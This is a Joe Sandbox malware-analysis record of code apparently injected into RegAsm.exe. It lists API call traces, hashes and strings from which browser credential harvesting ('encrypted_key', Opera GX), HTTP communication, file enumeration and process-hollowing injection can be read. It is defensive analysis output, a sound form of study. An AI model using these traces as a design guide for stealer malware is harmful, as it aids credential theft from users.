                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: QueryValue$EnumOpenlstrcpylstrlenwsprintf
                                                    • String ID: %s\%s
                                                    • API String ID: 3471882850-4073750446
                                                    • Opcode ID: c05b9aeffa2524c3aa9bcda23acaed7832a6b4e564aa8b15d5e8c89861718145
                                                    • Instruction ID: d7cee1983acf12d4360d724bf4cc3a4c29cf8c0d886bd7a19f0679c37ebee969
                                                    • Opcode Fuzzy Hash: c05b9aeffa2524c3aa9bcda23acaed7832a6b4e564aa8b15d5e8c89861718145
                                                    • Instruction Fuzzy Hash: 1721F27590012CAFEB609B50DD45BD9B7B9FF08304F4094E5E649A60A0CF749AD98F94
                                                    APIs
                                                    • VirtualAlloc.KERNEL32(;q@,;q@,00003000,00000040), ref: 00407474
                                                    • VirtualAlloc.KERNEL32(00000000,;q@,00003000,00000040), ref: 004074BF
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3051781987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: AllocVirtual
                                                    • String ID: ;q@$;q@
                                                    • API String ID: 4275171209-3893597124
                                                    • Opcode ID: ce50d067a10a9d200ba21eaef60b552f8d4fc485bf38c75f1e0756368e75d6fe
                                                    • Instruction ID: d3bad8f71399132065eca503ffa06903ce5ef1b7e5e995e1b9bcc650a41b767e
                                                    • Opcode Fuzzy Hash: ce50d067a10a9d200ba21eaef60b552f8d4fc485bf38c75f1e0756368e75d6fe
                                                    • Instruction Fuzzy Hash: D941B535A04209EFCB50CF98C485FADBBF0EB08364F1484A5E959EB391D734EA81CB45
                                                    APIs
                                                    • _MSFOpenExW.MSPDB140-MSVCRT ref: 00418E6C
                                                    • CreateThread.KERNEL32(00000000,00000000,00418C65,?,00000000,00000000), ref: 00418E85
                                                    • WaitForSingleObject.KERNEL32(?,000003E8), ref: 00418E96
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3051781987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CreateObjectOpenSingleThreadWait
                                                    • String ID:
                                                    • API String ID: 4234577939-0
                                                    • Opcode ID: f43b621d675ccc337efc39be0cc282dc91ce5b12264d272aea3fd1cbd3d3afdf
                                                    • Instruction ID: 4c5e3d0133d6e9f2eae60e2625ec9d3b543f1cf41f80d31bea27500df29b833e
                                                    • Opcode Fuzzy Hash: f43b621d675ccc337efc39be0cc282dc91ce5b12264d272aea3fd1cbd3d3afdf
                                                    • Instruction Fuzzy Hash: 4F315C75900208AFDB10EF61DC45BED3BB5BF15305F54412AF9159A1A1EF349A86CF88
                                                    APIs
                                                    • GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 00411EC9
                                                    • HeapAlloc.KERNEL32(00000000), ref: 00411ED0
                                                    • RegOpenKeyExA.KERNEL32(80000002,00000000,00020119,00000000), ref: 00411EEF
                                                    • RegQueryValueExA.KERNEL32(00000000,00000000,00000000,000000FF,000000FF), ref: 00411F0D
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3051781987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Heap$AllocOpenProcessQueryValue
                                                    • String ID:
                                                    • API String ID: 3676486918-0
                                                    • Opcode ID: dd008c8d00355dc8994383d20b0c3b1a5372c3a3245a183f1dace59f39d50ce9
                                                    • Instruction ID: 2ba135963ef3e1c949db86b07d2e2a79437377d0b90cfecc595d9e25d7200812
                                                    • Opcode Fuzzy Hash: dd008c8d00355dc8994383d20b0c3b1a5372c3a3245a183f1dace59f39d50ce9
                                                    • Instruction Fuzzy Hash: C2F03A79A40208FFEB10AFE0EC0AF9DBBBAFB06745F105064F701A91A0D77156949F40
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3051781987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID: ez@
                                                    • API String ID: 0-307298357
                                                    • Opcode ID: 3bbf64017ccec70b43ef0a4a85a6baf18d8732ef2f27285e686f093308f930eb
                                                    • Instruction ID: a860d7bb49b00275ae4f9f6a4a51eaec01057512aeaaa0d5d6857e8719e4b74b
                                                    • Opcode Fuzzy Hash: 3bbf64017ccec70b43ef0a4a85a6baf18d8732ef2f27285e686f093308f930eb
                                                    • Instruction Fuzzy Hash: FA61D270C08209EFCF14DF94D948BEEB7B0AB04315F2044AAE405B7291D779AE94DF6A
                                                    APIs
                                                    • lstrlenA.KERNEL32(00000000), ref: 00418C99
                                                    • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00418D4B
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3051781987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: lstrlen
                                                    • String ID: ERROR
                                                    • API String ID: 1659193697-2861137601
                                                    • Opcode ID: 63e6eed9abdabe16e44a68f7f9864da067214aca1ca454f7c695c55e2f80d023
                                                    • Instruction ID: 4cb9426ee5e73f282c12afd8d592c338adc4812851f741afb7acd22160182d69
                                                    • Opcode Fuzzy Hash: 63e6eed9abdabe16e44a68f7f9864da067214aca1ca454f7c695c55e2f80d023
                                                    • Instruction Fuzzy Hash: 6B3184B1E10204ABCF00EBA5DD46AEE7778FB15318F10051AF502E73A1DB389940CBA9
                                                    APIs
                                                    • _MSFOpenExW.MSPDB140-MSVCRT ref: 00418E6C
                                                    • CreateThread.KERNEL32(00000000,00000000,00418C65,?,00000000,00000000), ref: 00418E85
                                                    • WaitForSingleObject.KERNEL32(?,000003E8), ref: 00418E96
                                                    • Sleep.KERNEL32(000003E8,?,00000000,?,?), ref: 00418EA5
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3051781987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CreateObjectOpenSingleSleepThreadWait
                                                    • String ID:
                                                    • API String ID: 1990444757-0
                                                    • Opcode ID: db982492dfe86fd64df0525366e688e2b4b5a29edeeaa01de3fa1648289cf0de
                                                    • Instruction ID: 5657c23587d86dbe871ff5d5566c82c5f00d4f8eb17df63da99cc315ca23b86c
                                                    • Opcode Fuzzy Hash: db982492dfe86fd64df0525366e688e2b4b5a29edeeaa01de3fa1648289cf0de
                                                    • Instruction Fuzzy Hash: 52011774640204EBDB21EF21DC46BEC3B65BB11709F54412AF9169A1B1DB399A82CF89
                                                    APIs
                                                    • OpenProcess.KERNEL32(00000410,00000000,004154AA), ref: 00413576
                                                    • K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 00413596
                                                    • CloseHandle.KERNEL32(00000000), ref: 0041359F
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3051781987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CloseFileHandleModuleNameOpenProcess
                                                    • String ID:
                                                    • API String ID: 3183270410-0
                                                    • Opcode ID: 424327ca4c3cbaa72694fe0256f2ae6f23efaf6e2f470c7a486978a51854163c
                                                    • Instruction ID: 648301d2c24216510959a40647cebe15a857575c5a4660e0673f59272e1cdbeb
                                                    • Opcode Fuzzy Hash: 424327ca4c3cbaa72694fe0256f2ae6f23efaf6e2f470c7a486978a51854163c
                                                    • Instruction Fuzzy Hash: 68F0F27890120CFFDB11EFA0DC0AFDC7BB9AB09709F1444A5B615AA1A0D7B1ABD4DB44
                                                    APIs
                                                      • Part of subcall function 00411668: lstrcpyA.KERNEL32(00425200,00000000,?), ref: 004116A7
                                                    • StrCmpCA.SHLWAPI(00000000,Opera GX,00425200,00425200,?,?), ref: 0040D201
                                                      • Part of subcall function 00412F92: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00412FBC
                                                      • Part of subcall function 004117E0: lstrcpyA.KERNEL32(00000000,00000000), ref: 0041182C
                                                      • Part of subcall function 004117E0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041183A
                                                      • Part of subcall function 0041177A: lstrcpyA.KERNEL32(00000000,?,?,?,0041A98C,00000000,?,?,00428E5C,?,00000000), ref: 004117D3
                                                      • Part of subcall function 0041185B: lstrlenA.KERNEL32(00428E5C,?,00428E5C,?,00000000), ref: 0041186F
                                                      • Part of subcall function 0041185B: lstrcpyA.KERNEL32(00000000,?), ref: 004118A8
                                                      • Part of subcall function 0041185B: lstrcatA.KERNEL32(00000000,00000000), ref: 004118B4
                                                      • Part of subcall function 004116B4: lstrcpyA.KERNEL32(?,?,?,?,004118C6,00000000), ref: 004116F4
                                                      • Part of subcall function 00412F4C: GetFileAttributesA.KERNEL32(00000000,?,0040E526,?,00425200,?,?), ref: 00412F5B
                                                      • Part of subcall function 00407F8E: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00407FDF
                                                      • Part of subcall function 00407F8E: memcmp.MSVCRT ref: 00408034
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3051781987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: lstrcpy$lstrcat$AttributesFileFolderPathlstrlenmemcmp
                                                    • String ID: Opera GX
                                                    • API String ID: 1439182418-3280151751
                                                    • Opcode ID: 0fb77b7b81ea3809c0307192b11be850f65fcb2790e200c338288ed7b6fd4c59
                                                    • Instruction ID: fb3989cb2523bfc062273a9d11041c6471dda5227b0977fe00502919fff50608
                                                    • Opcode Fuzzy Hash: 0fb77b7b81ea3809c0307192b11be850f65fcb2790e200c338288ed7b6fd4c59
                                                    • Instruction Fuzzy Hash: 4BD113729001089ADF14FBF1DD56EEE737CAF14305F50412BF616A21E1EE39AB88CA59
                                                    APIs
                                                    • VirtualProtect.KERNEL32(00EBE9FC,458B0874,00000002,00000002), ref: 004079D0
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3051781987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ProtectVirtual
                                                    • String ID: @
                                                    • API String ID: 544645111-2766056989
                                                    • Opcode ID: 287ad8346a7fe6e5c9c93bd88e2f49757a3d10b5b68bd008e028ca123d1bf971
                                                    • Instruction ID: 108c03afaf6488205a77675aa431fcd5872e35c29fe2ccaab908e516a6f44892
                                                    • Opcode Fuzzy Hash: 287ad8346a7fe6e5c9c93bd88e2f49757a3d10b5b68bd008e028ca123d1bf971
                                                    • Instruction Fuzzy Hash: 2D31CBB5D08209EFEB10CF98C545BADBBF1FB04304F1485A6D455AB391D378AA81DF46
                                                    APIs
                                                      • Part of subcall function 004116B4: lstrcpyA.KERNEL32(?,?,?,?,004118C6,00000000), ref: 004116F4
                                                      • Part of subcall function 00406312: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00406373
                                                      • Part of subcall function 00406312: StrCmpCA.SHLWAPI(?), ref: 00406390
                                                      • Part of subcall function 00406312: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 004063BE
                                                      • Part of subcall function 00406312: HttpOpenRequestA.WININET(00000000,GET,?,00000000,00000000,00400100,00000000), ref: 0040640A
                                                      • Part of subcall function 00406312: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00406442
                                                      • Part of subcall function 00406312: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00406453
                                                    • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00417E8B
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3051781987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
                                                    • String ID: ERROR
                                                    • API String ID: 3287882509-2861137601
                                                    • Opcode ID: bb33d87117d8667f9c5c7158566ed321b33361f7c494144e9eddfb2cb9a39704
                                                    • Instruction ID: b6725acd924a18acdeaf76a85a33531c260c99ef83c6fe063ac976ef0ea738d9
                                                    • Opcode Fuzzy Hash: bb33d87117d8667f9c5c7158566ed321b33361f7c494144e9eddfb2cb9a39704
                                                    • Instruction Fuzzy Hash: 4B11D0319101089BCB14FFA2E8569DD7378AF50309F50412EF916971F2EF39AB48C788
                                                    APIs
                                                    • GetFileAttributesA.KERNEL32(00000000,?,0040E526,?,00425200,?,?), ref: 00412F5B
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3051781987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: AttributesFile
                                                    • String ID: &@
                                                    • API String ID: 3188754299-4010431647
                                                    • Opcode ID: c554d616c374e849fdf741f0e5d4d7b9930fb9937f03e0365571ee75c380a818
                                                    • Instruction ID: 5a9ed636e313f6a7dd176774e2c6308ea72efcd30315a16af32adb4bfda7ee87
                                                    • Opcode Fuzzy Hash: c554d616c374e849fdf741f0e5d4d7b9930fb9937f03e0365571ee75c380a818
                                                    • Instruction Fuzzy Hash: 4CF0C074C1020CEBCB00DFA5D5456DDB774AB11359F108156E522E72A0E7789B96DF44
                                                    APIs
                                                    • GetCurrentHwProfileA.ADVAPI32(?), ref: 00412674
                                                      • Part of subcall function 00411668: lstrcpyA.KERNEL32(00425200,00000000,?), ref: 004116A7
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3051781987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CurrentProfilelstrcpy
                                                    • String ID: Unknown
                                                    • API String ID: 2831436455-1654365787
                                                    • Opcode ID: 6f65f47d843f5c38b1e0a66190c485fb9fc1308ec2868120a4b7116f04a99c60
                                                    • Instruction ID: 79ae12f52d30196ee2c5170817a78a3de43ea3cd72a751e4cea9930dc4e20eb0
                                                    • Opcode Fuzzy Hash: 6f65f47d843f5c38b1e0a66190c485fb9fc1308ec2868120a4b7116f04a99c60
                                                    • Instruction Fuzzy Hash: 0CE04F30600108EFCF10EF65D881EDD37ACBB04788F50402AF905D7190DB74E995CB98
                                                    Strings
                                                    • failed to allocate %u bytes of memory, xrefs: 1FA504E7
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3059117906.000000001FA28000.00000020.00001000.00020000.00000000.sdmp, Offset: 1FA20000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1fa20000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: failed to allocate %u bytes of memory
                                                    • API String ID: 0-1168259600
                                                    • Opcode ID: 71fc717d39385746ce01d833d133baacc4281054a6983ea744a558fc2677734e
                                                    • Instruction ID: bd317ca2fc4ab4041da5aaa61827870f4c610bcf78cad84484092b92f7e03648
                                                    • Opcode Fuzzy Hash: 71fc717d39385746ce01d833d133baacc4281054a6983ea744a558fc2677734e
                                                    • Instruction Fuzzy Hash: 04C0127AEC832263C7511294BD01ECA79914F50591F054034FD4C59330D56DB8A193D3
                                                    APIs
                                                      • Part of subcall function 00411668: lstrcpyA.KERNEL32(00425200,00000000,?), ref: 004116A7
                                                      • Part of subcall function 0041185B: lstrlenA.KERNEL32(00428E5C,?,00428E5C,?,00000000), ref: 0041186F
                                                      • Part of subcall function 0041185B: lstrcpyA.KERNEL32(00000000,?), ref: 004118A8
                                                      • Part of subcall function 0041185B: lstrcatA.KERNEL32(00000000,00000000), ref: 004118B4
                                                      • Part of subcall function 004117E0: lstrcpyA.KERNEL32(00000000,00000000), ref: 0041182C
                                                      • Part of subcall function 004117E0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041183A
                                                      • Part of subcall function 0041177A: lstrcpyA.KERNEL32(00000000,?,?,?,0041A98C,00000000,?,?,00428E5C,?,00000000), ref: 004117D3
                                                    • lstrlenA.KERNEL32(00000000), ref: 004092EF
                                                    • lstrlenA.KERNEL32(00000000), ref: 00409303
                                                      • Part of subcall function 004116B4: lstrcpyA.KERNEL32(?,?,?,?,004118C6,00000000), ref: 004116F4
                                                      • Part of subcall function 00418DB9: _MSFOpenExW.MSPDB140-MSVCRT ref: 00418E6C
                                                      • Part of subcall function 00418DB9: CreateThread.KERNEL32(00000000,00000000,00418C65,?,00000000,00000000), ref: 00418E85
                                                      • Part of subcall function 00418DB9: WaitForSingleObject.KERNEL32(?,000003E8), ref: 00418E96
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3051781987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: lstrcpy$lstrlen$lstrcat$CreateObjectOpenSingleThreadWait
                                                    • String ID:
                                                    • API String ID: 3799617333-0
                                                    • Opcode ID: defa912096274b33364ccc9781972fdf005cb23e8a4ea8b6f4c2c678f65133d7
                                                    • Instruction ID: e682058c765c3eed9424c7c912d02b9114c1685d086e83408ab55d0a98466556
                                                    • Opcode Fuzzy Hash: defa912096274b33364ccc9781972fdf005cb23e8a4ea8b6f4c2c678f65133d7
                                                    • Instruction Fuzzy Hash: 1E71EC729101189ADF04FBA1DCA6DEE7379BF14305F50412EF616A21F1EE399A88CB94
                                                    APIs
                                                    • SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00412FBC
                                                      • Part of subcall function 00411668: lstrcpyA.KERNEL32(00425200,00000000,?), ref: 004116A7
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3051781987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: FolderPathlstrcpy
                                                    • String ID:
                                                    • API String ID: 1699248803-0
                                                    • Opcode ID: 47392e84d6d6294a81bee49d13ce944e3ea666f2a03f2c076f629e9461e68349
                                                    • Instruction ID: aa325d3f94b7a9653be548765aa3873853a6de89a1716966dfff1a03a5bef2b1
                                                    • Opcode Fuzzy Hash: 47392e84d6d6294a81bee49d13ce944e3ea666f2a03f2c076f629e9461e68349
                                                    • Instruction Fuzzy Hash: 7DE04F3094034DBBDB51EF50CC92FCD376C9B04B05F404191B60CAA0D0DA70EB858B54
                                                    APIs
                                                    • LocalAlloc.KERNEL32(00000040,00000001), ref: 00412FF2
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3051781987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: AllocLocal
                                                    • String ID:
                                                    • API String ID: 3494564517-0
                                                    • Opcode ID: 23ddd831960a07a4baf59c42516714ef093421010defdf0cacab57d0b5a2c2c6
                                                    • Instruction ID: d6433807a1b8db94d6cb6db165d9c0c75de4d80c94e6a7adbc32009b6d90f099
                                                    • Opcode Fuzzy Hash: 23ddd831960a07a4baf59c42516714ef093421010defdf0cacab57d0b5a2c2c6
                                                    • Instruction Fuzzy Hash: 2F019274900208FFDB05CF98C585BED7FF4EB0931AF248089E505AB294C279AF84DB15
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3051781987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: malloc
                                                    • String ID:
                                                    • API String ID: 2803490479-0
                                                    • Opcode ID: e9ef69333db613a216edd2c8bf2b23955e04f01125ce089b17a326d4bede4d29
                                                    • Instruction ID: 52e30e3b9de2c83f9cf9caa13978d237713c2858ae44fde087075dd4632ce1ce
                                                    • Opcode Fuzzy Hash: e9ef69333db613a216edd2c8bf2b23955e04f01125ce089b17a326d4bede4d29
                                                    • Instruction Fuzzy Hash: ABC04C70A1411DBB8B04EB59E94284DBBE89A04298B504069F40896151D671AE419658
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3051781987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Find$Filememset$CloseFirstNextwsprintf
                                                    • String ID: %s\%s$%s\%s\%s$%s\*.*$&lA
                                                    • API String ID: 1738266208-75341197
                                                    • Opcode ID: f7f780e0dd3665170da10018ac09bac4819302ea1bebc1e397a737024f7557df
                                                    • Instruction ID: 60e5edfdf85aad70732b1e4ef0ca2121454fa8e33e52d4ef02f059937bdc4f17
                                                    • Opcode Fuzzy Hash: f7f780e0dd3665170da10018ac09bac4819302ea1bebc1e397a737024f7557df
                                                    • Instruction Fuzzy Hash: 5DD14C71D00229ABDF21EB61DC46EED77BDAB14304F5040E6F609A61A1EB399BC4CF58
                                                    APIs
                                                    • wsprintfA.USER32 ref: 004177EB
                                                    • FindFirstFileA.KERNEL32(?,?), ref: 00417802
                                                    • StrCmpCA.SHLWAPI(?,00425240), ref: 00417830
                                                    • StrCmpCA.SHLWAPI(?,0042523C), ref: 00417846
                                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 00417AE3
                                                    • FindClose.KERNEL32(000000FF), ref: 00417AF7
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3051781987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Find$File$CloseFirstNextwsprintf
                                                    • String ID: %s\%s$%s\*
                                                    • API String ID: 180737720-2848263008
                                                    • Opcode ID: 657ecea2f7339c96ef864b768e83d4070e8e48e31d1e940a008eb1853424de94
                                                    • Instruction ID: dac6644e6c426f194ff9d57a8aa95e65468d73e99b130408ca5d31604c6df95e
                                                    • Opcode Fuzzy Hash: 657ecea2f7339c96ef864b768e83d4070e8e48e31d1e940a008eb1853424de94
                                                    • Instruction Fuzzy Hash: 72811C71900218ABDF10EBA0DC49EEA77BDBB05305F5441AAF519E20A1EF399BC4CF95
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3051781987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: memset
                                                    • String ID: image/jpeg
                                                    • API String ID: 2221118986-3785015651
                                                    • Opcode ID: cc8ab27e720a20a23eab8e41ad5ab027d939e4f2186a1a1e13e75b9e65c47b70
                                                    • Instruction ID: 8cb807e951e241fb08b0210496002e79f381f36e9f99992af28822dfc1dcb1ba
                                                    • Opcode Fuzzy Hash: cc8ab27e720a20a23eab8e41ad5ab027d939e4f2186a1a1e13e75b9e65c47b70
                                                    • Instruction Fuzzy Hash: A761F675910208EFDF01AFE0EC49BECBBBAFF05316F104025F915AA1A0DB359A95DB58
                                                    APIs
                                                    • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 0041739D
                                                    • HeapAlloc.KERNEL32(00000000), ref: 004173A4
                                                    • wsprintfA.USER32 ref: 004173BF
                                                    • FindFirstFileA.KERNEL32(?,?), ref: 004173D6
                                                    • StrCmpCA.SHLWAPI(?,00425240), ref: 00417404
                                                    • StrCmpCA.SHLWAPI(?,0042523C), ref: 0041741A
                                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 0041756F
                                                    • FindClose.KERNEL32(000000FF), ref: 00417583
                                                    • lstrcatA.KERNEL32(?,?,00000104), ref: 004175A7
                                                    • lstrcatA.KERNEL32(?), ref: 004175BA
                                                    • lstrlenA.KERNEL32(?), ref: 004175C6
                                                    • lstrlenA.KERNEL32(?), ref: 004175D6
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3051781987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Find$FileHeaplstrcatlstrlen$AllocCloseFirstNextProcesswsprintf
                                                    • String ID: %s\%s$%s\*
                                                    • API String ID: 13328894-2848263008
                                                    • Opcode ID: 15216038eecd218f53dfb6339684c482d6ccd4587650b80a72e0b2fa1e1dfb87
                                                    • Instruction ID: fd5b16bab9cc8da3066a7ef37530c76d79a35a43c54b9e21b9ef39b57dedf1c2
                                                    • Opcode Fuzzy Hash: 15216038eecd218f53dfb6339684c482d6ccd4587650b80a72e0b2fa1e1dfb87
                                                    • Instruction Fuzzy Hash: 42614D71940218ABDF10EBA0DD9AEDD777DBB15304F4004AAF619E20A1EB399BC4CF58
                                                    APIs
                                                    • memset.MSVCRT ref: 00410A4F
                                                    • memset.MSVCRT ref: 00410A5F
                                                    • CreateProcessA.KERNEL32(?,00413EEF,00000000,00000000,00000001,00000004,00000000,00000000,?,?), ref: 00410A81
                                                    • VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 00410AA7
                                                    • GetThreadContext.KERNEL32(?,00425200), ref: 00410ABF
                                                    • ReadProcessMemory.KERNEL32(?,63614D20,00000000,00000004,00000000), ref: 00410AE5
                                                    • VirtualAllocEx.KERNEL32(?,?,?,00003000,00000040), ref: 00410B01
                                                    • ResumeThread.KERNEL32(?), ref: 00410B13
                                                    • WriteProcessMemory.KERNEL32(?,00000000,00000000,?,00000000), ref: 00410B3B
                                                    • WriteProcessMemory.KERNEL32(?,?,?,?,00000000), ref: 00410B92
                                                    • WriteProcessMemory.KERNEL32(?,63614D20,?,00000004,00000000), ref: 00410BB5
                                                    • SetThreadContext.KERNEL32(?,00425200), ref: 00410BD3
                                                    • ResumeThread.KERNEL32(?), ref: 00410BDC
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3051781987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Process$MemoryThread$Write$AllocContextResumeVirtualmemset$CreateRead
                                                    • String ID: rBA
                                                    • API String ID: 619895632-1805662637
                                                    • Opcode ID: 8fae5ad8a6bd18f96976710600a56f6f1893c295b43ec00557706067b69940d9
                                                    • Instruction ID: 29a3e22a4fab1a202d948375e78a5d08e4a1dee15bb7358fe06653ab9b027ff8
                                                    • Opcode Fuzzy Hash: 8fae5ad8a6bd18f96976710600a56f6f1893c295b43ec00557706067b69940d9
                                                    • Instruction Fuzzy Hash: B561CD75A40208EFDB00DF98CC85FEDBBB5BF08315F108095F615AB2A1D3B5AA90DB24
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3059117906.000000001FA28000.00000020.00001000.00020000.00000000.sdmp, Offset: 1FA20000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1fa20000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
